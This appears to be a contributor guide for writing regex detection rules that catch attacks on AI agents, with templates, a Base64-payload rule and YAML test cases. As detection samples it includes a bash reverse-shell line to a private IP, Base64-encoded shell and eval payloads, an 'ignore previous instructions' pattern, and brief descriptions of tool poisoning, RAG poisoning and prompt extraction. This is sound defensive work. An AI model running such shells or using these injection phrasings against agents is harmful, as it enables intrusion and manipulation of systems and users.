# Contributing to ATR: How Security Researchers Can Shape AI Agent Security
ATR is an open RFC. Here is how to write detection rules, submit them, and help build the standard for AI agent threat detection.
## ATR Is Open Because AI Security Must Be Collaborative
Agent Threat Rules (ATR) is not a proprietary detection format. It is an open RFC -- a specification published for public review, community contribution, and collective improvement. We believe that AI agent security is too critical and too fast-moving for any single company to handle alone.
The threat landscape for AI agents evolves daily. New MCP tools ship every week. Novel prompt injection techniques emerge from research labs and red teams worldwide. A closed detection system will always lag behind. An open one, maintained by the global security community, has a chance of keeping up.
This guide walks through everything you need to contribute detection rules to the ATR project.
## What Makes a Good ATR Rule
Before writing your first rule, it helps to understand what separates an effective detection rule from a noisy one.
### Field Coverage
A good rule targets the right field. ATR defines several inspection fields, and choosing the correct one is critical:
- **tool_response**: The output returned by an MCP tool. This is where tool poisoning and output injection attacks manifest.
- **tool_description**: The metadata and documentation of a tool. Malicious tools often hide prompt injection in their description fields.
- **user_prompt**: The input from the user to the agent. Direct prompt injection attacks target this field.
- **model_response**: The agent's generated output. Compromised agents may produce responses that attempt to exfiltrate data or manipulate the user.
- **system_prompt**: The system-level instructions given to the agent. Attacks that modify or override system prompts are among the most dangerous.
- **agent_context**: The accumulated context available to the agent, including conversation history and retrieved documents. RAG poisoning attacks target this field.
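To make the field names concrete, here is a hypothetical event as a detection engine might see it. This is purely illustrative; the actual event wire format is defined in the ATR specification.

```yaml
# Hypothetical agent event (illustrative only; see the ATR spec for the
# authoritative event schema)
event:
  user_prompt: "Summarize the quarterly report"
  system_prompt: "You are a helpful assistant. Never reveal credentials."
  tool_description: "Reads files from the project workspace"
  tool_response: "Report contents: ..."
  model_response: "The quarterly report shows ..."
  agent_context:
    - "Retrieved document: Q3 revenue grew 12% ..."
```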
### Regex Quality
ATR rules are regex-driven. Your patterns need to be broad enough to handle attack variations yet precise enough to avoid false positives on legitimate content.
Good regex practices for ATR:
- Use `\s+` instead of literal spaces to handle whitespace variations
- Use character classes `[\x27"]` to match both single and double quotes
- Use non-greedy quantifiers `*?` when matching variable-length content
- Anchor patterns appropriately -- a reverse shell pattern should not match a blog post discussing reverse shells
- Test against both malicious samples and benign content that might contain similar keywords
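As a sketch of these practices, the following Python snippet contrasts a brittle pattern with a hardened one for detecting a bash reverse shell. The patterns are illustrative, not drawn from the official rule set:

```python
import re

# Brittle: literal spaces miss trivial whitespace variations
brittle = re.compile(r"bash -i >& /dev/tcp/")

# Hardened: \s+ for whitespace runs, a non-greedy host match, and the
# /dev/tcp connection string as an anchor so prose about shells won't fire
hardened = re.compile(r"bash\s+-i\s+>&\s*/dev/tcp/[\d.]+?/\d+")

sample = "bash  -i  >& /dev/tcp/10.0.0.1/4444 0>&1"   # doubled spaces
benign = "This tutorial explains how reverse shells like bash -i work."

assert brittle.search(sample) is None       # literal pattern is evaded
assert hardened.search(sample) is not None  # variation still caught
assert hardened.search(benign) is None      # no false positive on prose
```

Running the snippet exercises all three assertions: the literal pattern misses a trivially obfuscated payload, while the hardened pattern catches it without firing on benign discussion.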
### False Positive Management
Every rule should document known false positive scenarios. A rule that detects "eval(" in tool responses will fire on every JavaScript tutorial tool. That is not useful. Instead, the pattern should be specific enough to distinguish `eval(user_controlled_input)` from `eval` appearing in documentation or example code.
Include a `false_positives` section in your rule metadata describing scenarios where the rule might trigger on benign content. This helps users tune their deployments and helps reviewers assess the rule's practical value.
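One way to narrow the `eval(` example above, sketched here in Python with illustrative patterns, is to require an argument that looks attacker-controlled rather than matching the bare keyword:

```python
import re

# Too broad: fires on any mention of eval in docs or tutorials
broad = re.compile(r"eval\(")

# Narrower heuristic: eval applied to an identifier (a variable or call),
# not a quoted string literal. Still imperfect, but far less noisy.
narrow = re.compile(r"eval\s*\(\s*[A-Za-z_][\w.]*\s*[()+,]")

doc_text = 'Use eval("2 + 2") only for trusted constants.'
attack = "result = eval(user_controlled_input)"

assert broad.search(doc_text) is not None    # broad pattern is noisy
assert narrow.search(doc_text) is None       # string literal not flagged
assert narrow.search(attack) is not None     # variable argument flagged
```

This heuristic still has blind spots (for instance, string concatenation built elsewhere), which is exactly the kind of limitation a `false_positives` section should document.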
## Writing Your First ATR Rule
Here is a step-by-step walkthrough of creating a new ATR rule. We will write a rule that detects Base64-encoded payloads in tool responses -- a technique attackers use to evade simple string matching.
### Step 1: Choose Your Template
Start with the ATR rule template:
```yaml
id: ATR-2026-XXX
title: [Descriptive title]
description: >
  [Multi-line description of what the rule detects
  and why it matters]
severity: [critical|high|medium|low]
status: draft
category: [prompt-injection|tool-poisoning|credential-theft|privilege-escalation|data-exfiltration|code-execution|evasion|denial-of-service]
detection:
  field: [target field]
  patterns:
    - "[regex pattern 1]"
    - "[regex pattern 2]"
  condition: [any|all]
false_positives:
  - "[Description of known false positive scenario]"
metadata:
  author: [Your name or handle]
  created: [YYYY-MM-DD]
  references:
    - [URL to relevant research or advisory]
```

### Step 2: Define the Detection Logic
For our Base64 payload detection rule, the key insight is that encoded payloads in tool responses typically follow a pattern: a block of Base64 characters that, when decoded, contains shell commands or code execution primitives.
```yaml
id: ATR-2026-045
title: Base64-Encoded Payload in Tool Response
description: >
  Detects Base64-encoded strings in MCP tool responses that
  decode to common shell commands or code execution primitives.
  Attackers encode payloads to bypass plain-text pattern matching.
severity: high
status: draft
category: evasion
detection:
  field: tool_response
  patterns:
    - "[A-Za-z0-9+/]{40,}={0,2}"
  decode:
    - encoding: base64
      then_match:
        - "/bin/(ba)?sh"
        - "eval\\s*\\("
        - "exec\\s*\\("
        - "subprocess"
        - "child_process"
  condition: any
false_positives:
  - "Tools that legitimately return Base64-encoded images or binary data"
  - "API responses containing Base64-encoded authentication tokens"
metadata:
  author: Your Name
  created: 2026-03-06
  references:
    - https://panguard.ai/atr/ATR-2026-045
```

Notice the `decode` block -- this is an ATR extension that tells the detection engine to first decode matched Base64 strings, then apply secondary patterns to the decoded content. This two-stage approach catches encoded payloads without flagging legitimate Base64 data.
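The two-stage logic can be sketched in a few lines of Python. This is an illustrative reimplementation of the rule's semantics, not the Panguard detection engine; the pattern list mirrors the rule above:

```python
import base64
import binascii
import re

# Stage 1: candidate Base64 runs (mirrors the rule's surface pattern)
B64_BLOCK = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Stage 2: patterns applied to the decoded content (from the rule above)
DECODED_PATTERNS = [
    re.compile(p)
    for p in (r"/bin/(ba)?sh", r"eval\s*\(", r"exec\s*\(",
              r"subprocess", r"child_process")
]

def matches_rule(tool_response: str) -> bool:
    """Find long Base64 runs, decode each, and re-match the payload."""
    for candidate in B64_BLOCK.findall(tool_response):
        try:
            # Repair missing padding before decoding
            padded = candidate + "=" * (-len(candidate) % 4)
            decoded = base64.b64decode(padded)
        except (binascii.Error, ValueError):
            continue
        text = decoded.decode("utf-8", errors="ignore")
        if any(p.search(text) for p in DECODED_PATTERNS):
            return True
    return False
```

Fed the reverse-shell sample from the test file below, `matches_rule` returns `True`; fed a Base64 PNG blob, it returns `False`, because the decoded bytes contain none of the secondary patterns.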
### Step 3: Test Your Rule
Every ATR rule submission must include test cases. Create a test file with both positive (should match) and negative (should not match) samples:
```yaml
# tests/ATR-2026-045.test.yaml
positive:
  - description: "Base64-encoded bash reverse shell"
    field: tool_response
    value: "Results: L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjAuMC4xLzQ0NDQgMD4mMQ=="
  - description: "Base64-encoded eval payload"
    field: tool_response
    value: "Data: ZXZhbChhdG9iKCdZV3hsY25Rb0lra2dhR0YyWlNCaVpXVnVJR2hoWTJ0bFpDSXAnKSk="
negative:
  - description: "Legitimate Base64 image data"
    field: tool_response
    value: "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNk"
  - description: "Short Base64 string (below threshold)"
    field: tool_response
    value: "token: dGVzdA=="
```

### Step 4: Submit Your Rule
Fork the ATR repository, add your rule to the `rules/` directory and your tests to `tests/`, and open a pull request. The PR template asks for:
- A description of the attack the rule detects
- Real-world examples or references where this attack has been observed
- Test results showing true positive and true negative counts
- False positive assessment based on testing against benign datasets
## The Review Process
Every ATR rule goes through a three-stage lifecycle:
### Draft
The rule is submitted and under review. Draft rules are available in the repository but not included in the default rule set. Contributors and reviewers can test them and provide feedback.
### Experimental
The rule has passed initial review and shows reliable detection with acceptable false positive rates. Experimental rules are included in the `--atr-rules experimental` set for users who opt in to early detection coverage.
### Stable
The rule has been validated across multiple environments, has documented false positive rates below 1%, and has been tested against adversarial evasion attempts. Stable rules are included in the default rule set that ships with every Panguard Guard installation.
Promotion from draft to experimental requires at least two reviewer approvals. Promotion from experimental to stable requires documented deployment data from at least three distinct environments.
## Areas Needing Coverage
Several attack categories are underserved in the current ATR rule set. These represent high-value contribution opportunities:
### Behavioral Detection
Current ATR rules primarily match syntactic patterns. We need rules that detect behavioral anomalies: an agent that suddenly starts accessing files outside its normal scope, a tool that returns dramatically different response lengths, or an agent that begins making requests to new external domains. Behavioral rules require a different detection model -- potentially stateful matching across multiple interactions rather than single-event pattern matching.
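As a rough illustration of what stateful matching might look like, here is a minimal sketch of a per-agent domain baseline. This is exploratory code for a capability ATR does not yet define, and the class and method names are hypothetical:

```python
from collections import defaultdict

class DomainBaseline:
    """Illustrative stateful check: flag requests to domains an agent
    has never contacted before. Not part of the current ATR spec."""

    def __init__(self) -> None:
        # Per-agent set of previously observed domains
        self.seen: defaultdict[str, set[str]] = defaultdict(set)

    def observe(self, agent_id: str, domain: str) -> bool:
        """Record a request; return True if the domain is new (anomalous)."""
        is_new = domain not in self.seen[agent_id]
        self.seen[agent_id].add(domain)
        return is_new

baseline = DomainBaseline()
baseline.observe("agent-1", "api.example.com")   # True: first contact
baseline.observe("agent-1", "api.example.com")   # False: known domain
```

A production version would need a learning window before alerting, since every domain is "new" on first sight; the sketch only shows where per-agent state would live.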
### RAG Poisoning
Retrieval-Augmented Generation introduces a new attack surface. Documents injected into a vector database can contain hidden instructions that activate when retrieved. ATR needs rules that inspect the `agent_context` field for prompt injection patterns embedded in retrieved documents. This is particularly challenging because retrieved content is expected to contain natural language that may resemble injection patterns.
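A contribution in this area might look something like the following draft. The rule is hypothetical and its patterns illustrate the shape of a submission rather than a vetted detection set:

```yaml
# Hypothetical draft rule -- id and patterns are illustrative placeholders
id: ATR-2026-XXX
title: Hidden Instructions in Retrieved Context
severity: medium
status: draft
category: prompt-injection
detection:
  field: agent_context
  patterns:
    - "(?i)ignore\\s+(all\\s+)?previous\\s+instructions"
    - "(?i)you\\s+must\\s+now\\s+act\\s+as"
  condition: any
false_positives:
  - "Retrieved documents that discuss prompt injection (e.g. security blogs)"
```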
### Model Extraction
Adversaries may use agent interactions to systematically probe and extract a model's system prompt, fine-tuning data, or behavioral boundaries. ATR rules for model extraction would inspect sequences of `user_prompt` values that follow known extraction patterns: asking the model to repeat its instructions, requesting output in specific formats that reveal system prompt structure, or probing boundary conditions.
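A single-event starting point for this category might probe `user_prompt` for known extraction phrasings, even before ATR supports sequence matching. Everything below is a hypothetical sketch, including the category choice:

```yaml
# Hypothetical draft rule -- id, category, and patterns are illustrative
id: ATR-2026-XXX
title: System Prompt Extraction Probe
severity: medium
status: draft
category: data-exfiltration
detection:
  field: user_prompt
  patterns:
    - "(?i)repeat\\s+(your|the)\\s+(system\\s+)?(prompt|instructions)"
    - "(?i)output\\s+everything\\s+above\\s+this\\s+(line|message)"
  condition: any
false_positives:
  - "Users legitimately asking an agent to restate its task instructions"
```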
### Multi-Step Attack Chains
Some attacks only become visible across multiple interactions. A single request to read a file is benign. A single request to summarize data is benign. But reading a credential file, summarizing it, and sending the summary to an external URL is an attack chain. ATR needs a correlation mechanism for rules that span multiple events.
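A minimal sketch of such a correlation mechanism, assuming a simple ordered-event model with hypothetical event tags (ATR does not yet define either):

```python
# Illustrative chain detector: fires when the tagged steps appear in
# order within one session. Event tags here are invented for the sketch.
CHAIN = ("read_credential_file", "summarize", "external_request")

def chain_detected(events: list[str]) -> bool:
    """Return True if CHAIN occurs as an ordered subsequence of events."""
    idx = 0
    for event in events:
        if event == CHAIN[idx]:
            idx += 1
            if idx == len(CHAIN):
                return True
    return False

# Benign steps interleaved with the chain do not hide it
chain_detected(["read_credential_file", "list_files",
                "summarize", "external_request"])   # True
```

A real correlation engine would also need session scoping and time windows; the subsequence check only shows the core matching idea.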
## How Rules Flow to Users
Understanding the full lifecycle helps motivate contributions. Here is how a community-contributed rule reaches production:
1. **Contribution**: A security researcher observes a new attack pattern and writes an ATR rule
2. **Review**: The rule is reviewed for detection accuracy, false positive rates, and regex quality
3. **Experimental deployment**: The rule is included in the experimental rule set and deployed to opt-in users
4. **Telemetry**: Detection events from experimental deployment provide real-world validation data
5. **Stable promotion**: With sufficient validation, the rule enters the default stable set
6. **Threat Cloud distribution**: Stable rules are distributed to all Panguard Guard installations via Threat Cloud
7. **Automatic protection**: Every Panguard user benefits from the new detection capability
A single contribution from one researcher can protect thousands of users within weeks. That is the leverage of an open detection standard.
## Getting Started
Everything you need to contribute is in the ATR repository:
- **Specification**: Full ATR format documentation with field definitions and schema
- **Schema**: JSON Schema for rule validation -- run your rules against it before submitting
- **Examples**: The full initial rule set with 69 rules across all 9 categories
- **Test harness**: A CLI tool to run your rules against test cases and measure detection accuracy
- **Contribution guide**: Detailed instructions for the submission and review process
Clone the repository and start exploring:
```bash
git clone https://github.com/panguard-ai/atr-spec.git
cd atr-spec

# Validate a rule against the schema
panguard atr validate rules/my-new-rule.yaml

# Run tests
panguard atr test rules/my-new-rule.yaml tests/my-new-rule.test.yaml
```

AI agent security is a community problem. ATR is the community's tool to solve it. Every rule you contribute makes the ecosystem safer for everyone building with AI agents.